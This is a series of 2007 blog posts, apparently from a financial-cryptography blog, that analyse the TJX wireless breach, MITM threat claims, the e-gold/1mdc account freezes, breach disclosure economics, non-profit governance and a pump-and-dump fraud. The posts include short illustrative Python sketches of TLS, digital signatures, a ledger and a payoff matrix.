    So where's the evidence of the MITM? Guys talking about something isn't the same as doing it (and the penultimate paragraph seems to be talking about DNS tunnelling as well). People have been demoing this sort of stuff at conferences for decades ... we know it is possible. What we also know is that it is not a good use of your valuable time as a crim. People who do this sort of thing for a living search for techniques that give low visibility and high gathering capability. Broadcasting in order to steal a single username and password fails on both counts.

    If we were scientists, or risk-based security scholars, what we need is evidence that they did the MITM *and* committed a theft in doing so. Only then can we know enough to allocate the resources to solving the problem.

    To wrap up, here is some *credible* news that indicates how to economically attack users:

    Pump and dump fraudsters targeting hotels and Internet cafes, says FBI

    Cyber crooks are installing key-logging malware on public computers located in hotels and Internet cafes in order to steal log-in details that are used to hack into and hijack online brokerage accounts to conduct pump and dump scams.

    The US Federal Bureau of Investigation (FBI) has found that online fraudsters are targeting unsuspecting hotel guests and users of Internet cafes.

    When investors use the public computers to check portfolios or make a trade, fraudsters are able to capture usernames and passwords. Funds are then looted from the brokerage accounts and used to drive up the prices of stocks the fraudsters had bought earlier. The stock is then sold at a profit.

    In an interview with Bloomberg reporters, Shawn Henry, deputy assistant director of the FBI's cyber division, said people wouldn't think twice about using a computer in an Internet cafe or business centre in a hotel, but he warns investors not to use computers they don't know are secure.

    Why is this credible, and the other one not? Because the crim is not sitting there with his equipment -- he's using the public computer to do all the dangerous work.

    Posted by iang at 02:18 PM | Comments (1) | TrackBack

    May 07, 2007

    WSJ: Soft evidence on a crypto-related breach

    Unconfirmed claims are being made in the WSJ that the hackers in the TJX case did the following:

    1. sat in a carpark and listened into a store's wireless net.
    2. cracked the WEP encryption.
    3. scarfed up user names and passwords ....
    4. used that to then access centralised databases to download the CC info.

    The TJX hackers did leave some electronic footprints that show most of their break-ins were done during peak sales periods to capture lots of data, according to investigators. They first tapped into data transmitted by hand-held equipment that stores use to communicate price markdowns and to manage inventory. "It was as easy as breaking into a house through a side window that was wide open," according to one person familiar with TJX's internal probe. The devices communicate with computers in store cash registers as well as routers that transmit certain housekeeping data.

    After they used that data to crack the encryption code the hackers digitally eavesdropped on employees logging into TJX's central database in Framingham and stole one or more user names and passwords, investigators believe. With that information, they set up their own accounts in the TJX system and collected transaction data including credit-card numbers into about 100 large files for their own access. They were able to go into the TJX system remotely from any computer on the Internet, probers say.

    OK. So assuming this is all true (and no evidence has been revealed other than the identity of the store where it happened), what can we say? Lots, and it is all unpopular. Here's a scattered list of things, with some semblance of connectivity:

    a. Notice how the crackers still went for the centralised database. Why? It is validated information, and is therefore much more valuable and economic. The gang was serious and methodical. They went for the databases.

    Conclusion: Eavesdropping isn't much of a threat to credit cards.

    b. Eavesdropping is a threat to passwords, assuming that is what they picked up. But, we knew that way back, and that exact threat is what inspired SSH: eavesdroppers sniffing for root passwords. It's also where SSL is most sensibly used.

    c. Eavesdropping is a threat, but MITM is not: by the looks of it, they simply sat there and sucked up lots of data, looking for the passwords. MITMs are just too hard to make them economic, *and* they leave tracks. "Who exactly is it that is broadcasting from that car over there....?"

    (For today's almost evidence of the threat of MITMs see the BBC!)

    d. Therefore, SSL v1 would have been sufficient to protect against this threat level. SSL v2 was overkill, and over-expensive: note how it wasn't deployed to protect the passwords from being eavesdropped. Neither was any other strong protocol. (Standard problem: most standardised security protocols are too heavy.)

    TJX and 45 million Americans say "thanks, guys!" I reckon it is going to take the other 255 million Americans to lose big time before this lesson is attended to.

    e. Why did they use a weak crypto protocol? Because it is the one delivered in the hardware.

    Question: Why is hardware often delivered with weak crypto?

    f. And, why was a weak crypto protocol chosen by the WEP people? And why are security observers skeptical that the new replacement for WEP will last any longer? The solution isn't in the "guild" approach I mentioned earlier, so forget ranting about how people should use a good security expert. It's in the institutional factors: security is inversely proportional to the number of designers. And anything designed by an industry cartel has a lot of designers.

    g. Even if they had used strong crypto, could the breach have happened? Yes, because the network was big and complex, and the hackers could have simply plugged into some place elsewhere. Check out the clue here:

    The hackers in Minnesota took advantage starting in July 2005. Though their identities aren't known, their operation has the hallmarks of gangs made up of Romanian hackers and members of Russian organized crime groups that also are suspected in at least two other U.S. cases over the past two years, security experts say. Investigators say these gangs are known for scoping out the least secure targets and being methodical in their intrusions, in contrast with hacker groups known in the trade as "Bonnie and Clydes" who often enter and exit quickly and clumsily, sometimes strewing clues behind them.

    Recall that transactions are naked and vulnerable. Because the data is seen in so many places, savvy FCers assume the transactions are visible by default, and thus vulnerable unless intrinsically protected.

    h. And, even if the entire network had been protected by some sort of overarching crypto protocol like WEP, the answer is to take over a device. Big stores means big networks means plenty of devices to take over.

    i. Which leaves end-to-end encryption. The only protection you can really count on is end-to-end. WEP, WPA, IPSec and other such infrastructure-level systems are only a hopeful answer to an easy question; end-to-end security protocols are the real answer to application-level questions.

    (e.g., they could have used SSL for protecting the password access to the databases, end to end. But they didn't.)
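
    As a rough illustration of what that end-to-end choice looks like in practice, here is a minimal Python sketch of a client wrapping its database login in TLS. The host name, port and credential format are invented placeholders, not anything from the TJX network.

        # Sketch: the password is encrypted from the client application all
        # the way to the database host, so neither the store wireless segment
        # nor any router in between sees it in the clear.
        import socket
        import ssl

        context = ssl.create_default_context()        # verifies the server's certificate

        with socket.create_connection(("db.example.internal", 5999)) as raw:
            with context.wrap_socket(raw, server_hostname="db.example.internal") as tls:
                tls.sendall(b"LOGIN store_admin s3cret\n")   # protected end to end
                print(tls.recv(1024))

    The point is not the particular protocol -- any end-to-end channel from the application to the database would have denied the eavesdroppers the passwords, whatever happened to WEP underneath.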

    j. The other requirement is to make the data insensitive to breaches. That is, even if a crook gets all the packets, he can't do anything with them. Not naked, as it were. End-to-end encryption then becomes a privacy benefit, not a security necessity.

    However, to my knowledge, only Ricardo and AADS deliver this, and most other designers are still wallowing around in the mud of encrypted databases. A possible exception to this is the selective disclosure approach ... but for various business reasons that is even less likely to be fielded than Ricardo and AADS were.
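
    To show the shape of the idea (and only the shape -- this is not Ricardo's or AADS' actual design), here is a sketch of a transaction record that carries an instruction and a signature rather than a reusable secret. It assumes the pyca/cryptography package; all names and values are illustrative.

        # Sketch of a breach-insensitive record: the wire and the database hold
        # an instruction plus a signature over it, never a password or card
        # number that could be replayed to authorise something else.
        from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

        signing_key = Ed25519PrivateKey.generate()     # held only by the payer
        verify_key = signing_key.public_key()          # held by the issuer / auditor

        instruction = b"pay 42.00 to merchant-7731 ref 2007-05-07-0001"
        signature = signing_key.sign(instruction)

        # A crook who captures (instruction, signature) learns the details of
        # this one payment, but gains nothing with which to forge another --
        # hence encryption on top is a privacy matter, not a survival matter.
        verify_key.verify(signature, instruction)      # raises InvalidSignature if tampered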

    k. Why don't we use more end-to-end encryption with naked transaction protocols? One reason is that they don't scale: we have to write one for each application. Another reason is that we've been taught not to for generations: "you should use a standard security product." ... as seen by TJX, who *did* use a standard security product.

    Conclusion: Security advice is "lowest common denominator" grade. The best advice is to use a standard product that is inapplicable to the problem area, and if that's the best advice, that also means there aren't enough FC-grade people to do better.

    l. "Oh, we didn't mean that one!" Yeah, right. Tell us how to tell? Better yet, tell the public how to tell. They are already being told to upgrade to WPA, as if improving 1% of their network from 20% security to 80% security is going to help.

    m. In short, people will seize on the encryption angle as the critical element. It isn't. If you are starting to get to the point of confusion due to the multiplying conflicts, silly advice, and sense of powerlessness the average manager has, you're starting to understand.

    This is messy stuff, and you can pretty much expect most people to not get it right. Unfortunately, most security people will get it wrong too in a mad search for the single most important mistake TJX made.

    The real errors are systemic: why are they storing SSNs anyway? Why are they using a single number for the credit card? Why are retail transactions so pervasively bound with identity, anyway? Why is it all delayed credit-based anyway?

    Posted by iang at 02:27 PM | Comments (4) | TrackBack

    April 28, 2007

    US moves to freeze Gold payment reserves

    The gold community is a-buzz with the news ... first an announcement from BullionVault (no URL):

    There have been growing stresses on our relationship with Brinks Inc, the US-owned vault operator, and it has become clear that they feel uncomfortable about continuing to vault BullionVault gold.

    Why this might be so I am genuinely unable to say. Their exact reasoning has not been disclosed to us.

    Fortunately, there is an excellent alternative available to us in ViaMat International, the largest Swiss-owned vault operator, and one which has a full quota of internationally located professional bullion vaults.

    Swiss ownership suggests an independence from some of the pressures which Brinks may have found themselves operating under recently. Also you - our users - have chosen to vault 26 times as much gold in Switzerland as in the United States, so we believe this change will be both natural and welcome.

    This is an echo of the old e-gold story, where different reputable vault companies handed the e-gold reserves around like it was musical chairs. BullionVault is a new-generation gold system, not encouraging payments but instead encouraging holding, buying and selling. It's not yet clear why they would be a threat.

    But then, from 1mdc, a payment system:

    ATTENTION

    Friday Apr 27 2007 - 4AM UTC

    It appears that a U.S. Government court order has forced e-gold(R) to close down or confiscate all of 1mdc's accounts. All of 1mdc account's have been closed at e-gold by order of the US Government.

    Please note that it appears the accounts of a number of the largest exchangers and largest users of e-gold have also been closed or confiscated overnight: millions of Euros of gold have been held in this event. A couple of large exchanger's accounts have been shutdown.

    If the confiscation or court order in the USA is reversed, your e-gold grams remaining in 1mdc will "unbail" normally to your e-gold account.

    We suggest not panicking: more will be known on Monday when there will be more activity in the courts.

    You CAN spend your 1mdc back and fore to other 1mdc accounts. 1mdc is operating normally within 1mdc. However you should be aware there is the possibility your e-gold will never be released from e-gold due to the court order.

    Ultimately e-gold(R) is an entirely USA-based company, owned and operated by US citizens, so, as e-gold users we must respect the decisions of US courts and the US authorities regarding the disposition of e-gold. Even though 1mdc has no connection whatsoever to the USA, and most 1mdc users are non-USA, e-gold(R) is USA based.

    You are welcome to email "team@1mdc.com", thank you.

    Yowsa! That's heavy. And now, BullionVault's actions make perfect sense. Brinks probably heard rumour of happenings, and BullionVault are probably sweating off those pounds right now crossing the border with rucksacks of kg of yellow ballast.

    It's worthwhile looking at how 1mdc worked, so as to understand what all the above means. 1mdc is simply a pure-play e-gold derivative system, in that 1mdc maintained one (or some) e-gold accounts for the reserve value, and then offered an accounting system in grams for spending back and forth.

    1mdc then stands out as not actually managing and reserving in gold. Instead it manages e-gold ... which manages and reserves in gold. Now, contractually, this would be quite messy, except that the website has generally made no bones about this: 1mdc is just e-gold, handled better.
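
    A toy model may make the layering clearer. This is a guess at the general shape only, not 1mdc's actual code: one reserve figure mirroring the issuer's e-gold holding, and an internal book of gram balances that spends back and forth without the reserve ever moving.

        # Toy derivative ledger in the 1mdc style (illustrative names and
        # numbers only).  The reserve is the gold held at e-gold; the accounts
        # are the issuer's own book entries denominated in grams.
        class DerivativeLedger:
            def __init__(self) -> None:
                self.reserve_grams = 0.0
                self.accounts: dict[str, float] = {}

            def bail_in(self, account: str, grams: float) -> None:
                # user sends e-gold to the issuer's reserve account; the issuer
                # credits the same amount on its internal book
                self.reserve_grams += grams
                self.accounts[account] = self.accounts.get(account, 0.0) + grams

            def spend(self, src: str, dst: str, grams: float) -> None:
                # internal transfer: only book entries move, the reserve does not
                if self.accounts.get(src, 0.0) < grams:
                    raise ValueError("insufficient balance")
                self.accounts[src] -= grams
                self.accounts[dst] = self.accounts.get(dst, 0.0) + grams

            def unbail(self, account: str, grams: float) -> None:
                # redemption back out to the user's own e-gold account -- the
                # step that fails when the underlying reserve is frozen
                if self.accounts.get(account, 0.0) < grams:
                    raise ValueError("insufficient balance")
                self.accounts[account] -= grams
                self.reserve_grams -= grams

    Internal spends keep working even with the reserve frozen, which is exactly the situation 1mdc describes above: payments within 1mdc continue, but unbailing depends on e-gold releasing the underlying grams.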

    So, above, 1mdc is totally unaffected! Except that all the users who held e-gold there (in 1mdc) are now totally stuffed! Well, we'll see in time what the real story is, but when this sort of thing happens, there are generally some losers.

    What then was the point of 1mdc? e-gold were too stuffy in many ways. One was that they charged a lot; another was that the owners of e-gold were pretty aggressive characters, and they scared a lot of their customers away. Other problems existed which resulted in a steady supply of customers over to 1mdc, who famously never charged fees.

    We could speculate that 1mdc was destined for sale at some stage. And I stress, I don't actually know what the point was. In contrast to the e-gold story, 1mdc ran a fairly tight ship, printed all of their news in the open, and didn't share the strategy beyond that.

    It may appear then that the US has moved to close down competition. Other than pique at not being able to see the account holders, this appeared yesterday to be a little mysterious and self-damaging. Today's news, however, clarifies matters, which I'll try and write a bit more about in another entry:

    ...the Department of Justice also obtained a restraining order on the defendants to prevent the dissipation of assets by the defendants, and 24 seizure warrants on over 58 accounts believed to be property involved in money laundering and operation of an unlicensed money transmitting business.

    Posted by iang at 11:15 AM | Comments (5) | TrackBack

    April 17, 2007

    Our security sucks. Why can't we change? What's wrong with us?

    Adam over at EC joined the fight against the disaster known as Internet Security and decided Choicepoint was his wagon. Mine was phishing, before it got boring.

    What is interesting is that Adam has now taken on the meta-question of why we didn't do a better job. Readers here will sympathise. Read his essay about how the need for change is painful, both directly and broadly:

    At a human level, change involves loss and the new. When we lose something, we go through a process, which often includes shock, anger, denial, bargaining and acceptance. The new often involves questions of trying to understand the new, understanding how we fit into it, if our skills and habits will adapt well or poorly, and if we will profit or lose from it.

    Adam closes with a plea for help on disclosure:

    I'm trying to draw out all of the reasons why people are opposed to change in disclosure habits, so we can overcome them.

    I am not exactly opposed but curious, as I see the issues differently. So in a sense, deferring for a moment a brief comment on the essay, here are a few comments on disclosure.

    1. Disclosure is something that is very hard to isolate. SB1386 was a big win, but it only covered the easy territory: you, bad company, know the victim's name, so tell them.
    2. Disclosure today doesn't cover what we might call secondary disclosure, which is what Adam is looking for. As discussed by Schechter and Smith, and in my Market for Silver Bullets (a toy payoff sketch after this list illustrates the equilibrium):

      Schechter & Smith use an approach of modelling risks and rewards from the attacker's point of view which further supports the utility of sharing information by victims:

      Sharing of information is also key to keeping marginal risk high. If the body of knowledge of each member of the defense grows with the number of targets attacked, so will the marginal risk of attack. If organizations do not share information, the body of knowledge of each one will be constant and will not affect marginal risk. Stuart E. Schechter and Michael D. Smith "How Much Security is Enough to Stop a Thief?", Financial Cryptography 2003 LNCS Springer-Verlag.

      Yet, to share raises costs for the sharer, and the benefits are not accrued to the sharer. This is a prisoner's dilemma for security, in that there may well be a higher payoff if all victims share their experiences, yet those that keep mum will benefit and not lose more from sharing. As all potential sharers are joined in an equilibrium of secrecy, little sharing of security information is seen, and this is rational. We return to this equilibrium later.

    3. Disclosure implies the company knows what happened. What if they don't?
    4. Disclosure assumes that the company will honestly report the full story. History says they won't.
    5. Disclosure of the full story is only ... part of the story. "We lost a laptop." So what? "Don't do that again..." is hardly a satisfactory, holistic or systemic response to the situation.

      (OK, so some explanation. At what point do we forget the nonsense touted in the press and move on to a real solution where the lost data doesn't mean a compromise? IOW, "we were given the task of securing all retail transactions......")
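
    On the Schechter & Smith point above, a toy payoff matrix shows the equilibrium of secrecy in miniature. The numbers are invented purely to exhibit the shape of the dilemma, not measured costs:

        # Toy disclosure dilemma: each breach victim chooses to share or keep
        # mum.  Sharing costs the sharer, while the improved defence benefits
        # every firm equally.  All figures are illustrative.
        SHARE, MUM = "share", "mum"
        COST_OF_SHARING = 3        # legal / reputational cost borne by the sharer
        BENEFIT_PER_SHARER = 2     # defensive benefit each firm gets per sharer

        def payoff(me: str, other: str) -> int:
            sharers = (me == SHARE) + (other == SHARE)
            return BENEFIT_PER_SHARER * sharers - (COST_OF_SHARING if me == SHARE else 0)

        for me in (SHARE, MUM):
            for other in (SHARE, MUM):
                print(f"me={me:5} other={other:5} -> my payoff {payoff(me, other)}")

        # Keeping mum dominates (2 > 1 and 0 > -1), yet mutual sharing (1 each)
        # beats mutual silence (0 each): a prisoner's dilemma, hence the
        # rational equilibrium of secrecy described above.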

    So, while I think that there is a lot to be said about disclosure, I think it is also a limited story. I personally prefer some critical thought -- if I can propose half a dozen solutions to some poor schmuck company's problems, why can't they?

    And it is to that issue that Adam's essay really speaks. Why can't we change? What's wrong with us?

    Posted by iang at 03:42 PM | Comments (5) | TrackBack

    April 09, 2007

    Does non-profit mean non-governance? Evidence from the fat, rich and naive business sector

    I've previously blogged on how the non-profit sector is a happy hunting ground for scams, fraud, incentive deals and all sorts of horrible arrangements. This caused outrage among those who believe that non-profits are somehow protected by their basic and honest goodness. Actually, they are fat, happy and ripe for fraud.

    The basic conditions are these:

    • lots of money
    • lots of people from "I want to do good" background
    • little of the normal governance is necessary

    Examples abound, if you know how to look. Coming from a background of reading the scams and frauds that rip apart the commercial sector, seeing it in the non-profit sector is easy, because of the super-fertile conditions mentioned above.

    Here's one. In New York state in the US of A, the schools have been found taking incentives to prefer one lender over another for student loans.

    [State Attorney-General] Cuomo has sent letters to and requested documents from more than a hundred schools for information about any financial incentives the schools or their administrators may have derived from doing business with certain lenders, such as gifts, junkets, and awards of stock.

    A common practice exposed by Cuomo is a revenue-sharing agreement, whereby a lender pays back a school a fixed percentage of the net value loans steered its way. Lenders particularly benefit when schools place them on a short list of “preferred” lenders, since 3,200 firms nationwide are competing for market share in the $85 billion a year business.

    Here's an inside tip that I picked up from my close observation of the mutual funds scandal, also brought by then NY-AG Eliot Spitzer (now Governor, an easy pick as he brought in $1.5bn in fines). If the Attorney-General writes those letters, he already has the evidence. So we can assume, for the working purposes of a learning exercise, that this is in fact what is happening.

    There's lots of money ($85Bn). The money comes from somewhere. It can be used in small incentives to steer the major part in certain directions.

    To narrow the options, most schools publish lists of preferred lenders for both government and private loans. They typically feature half a dozen lenders, but they might have only one. Students should always ask if the school is getting any type of payment or service from lenders on the list.

    To get a loan, schools must certify that you are qualified. By law, schools can't refuse to certify a loan, nor can they cause "unreasonable delays," because you choose a nonpreferred lender. That said, many schools strongly discourage students from choosing a nonpreferred lender.

    ...

    The University of North Carolina at Chapel Hill tells students on a form that if they choose a lender other than the school's sole preferred lender for Stafford loans, "there will be a six-week delay in the processing of your loan application" because it must be processed manually.

    How do we address this? If we are a non-profit, then we can do these things:

    • pick a very solid mission.
    • build an environment that supports that mission, down to the cellular level.
    • create an open disclosure policy which allows others to help us pick up drift.
    • especially, create a solid framework for all "deals."
    • put together a team that knows governance.

    It's not so exceptional. Some schools got it:

    Thirty-one other schools joined Penn and NYU in adopting a code of conduct that prohibits revenue-sharing with lenders, requires schools to disclose why they chose preferred lenders, and bans financial aid officers and other school officials from receiving more than nominal gifts from lenders.

    Clues in bold. How many has your big fat, rich open source non-profit got? I know one that has all of the first list, and has none of the second.

    Posted by iang at 07:19 AM | Comments (3) | TrackBack

    March 17, 2007

    An ordinary crime: stock manipulation

    Sometimes when we can't seem to get anywhere on analysing our own sector of criminal activity, it helps to look at some ordinary stuff. Here's one:

    According to the Commission's complaint, between July and November 2006, the Defendants repeatedly hijacked the online brokerage accounts of unwitting investors using stolen usernames and passwords. Prior to intruding into these accounts, the Defendants acquired positions in the securities of at least fourteen issuers, including Sun Microsystems, Inc., and "out of the money" put options on shares of Google, Inc. Then, without the accountholders' knowledge, and using the victims' own accounts and funds, the Defendants placed scores of unauthorized buy orders at above-market prices. After these unauthorized buy orders were placed, the Defendants sold the positions held in their own accounts at the artificially inflated prices, realizing profits of over $121,500.

    To achieve this benefit, the prosecution alleges that $875,000 of damage was done.

    It's a point worth underscoring: a criminal attack in our world often involves doing much more damage than the gain to the criminal. For that reason, we must focus on the overall result and not on the headline number. Here's a more aggressive damages number:

    The pump and dump scheme, which occurred between July and November 2006, has cost one brokerage firm at least $2m in losses. An estimated 60 customers and nine US brokerage firms were identified as victims.

    Also, funds seized.
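
    For scale, here is a back-of-the-envelope comparison of the figures quoted above, taking the numbers at face value:

        # Damage per dollar of criminal gain, using the figures quoted above.
        criminal_gain = 121_500        # profits alleged by the SEC
        damage_alleged = 875_000       # damage alleged by the prosecution
        brokerage_losses = 2_000_000   # losses reported by one brokerage firm

        print(damage_alleged / criminal_gain)      # roughly 7.2
        print(brokerage_losses / criminal_gain)    # roughly 16.5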

    Posted by iang at 08:05 AM | Comments (0) | TrackBack